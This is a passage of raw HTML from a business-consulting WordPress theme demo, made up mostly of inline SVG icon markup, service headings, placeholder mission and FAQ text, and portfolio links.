c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Explore More </a>
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>		    
	        the language of business	        <h3>Consultancy That Empowers You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#our-philo">our philosophy</a>
				<a href="#our-mission">our mission</a>
				<a href="#our-vision">our vision</a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Philosophy</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Mission</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Vision</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1-1200x1200.jpg 1200w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
	        Digital solutions	        <h3>Our Services</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
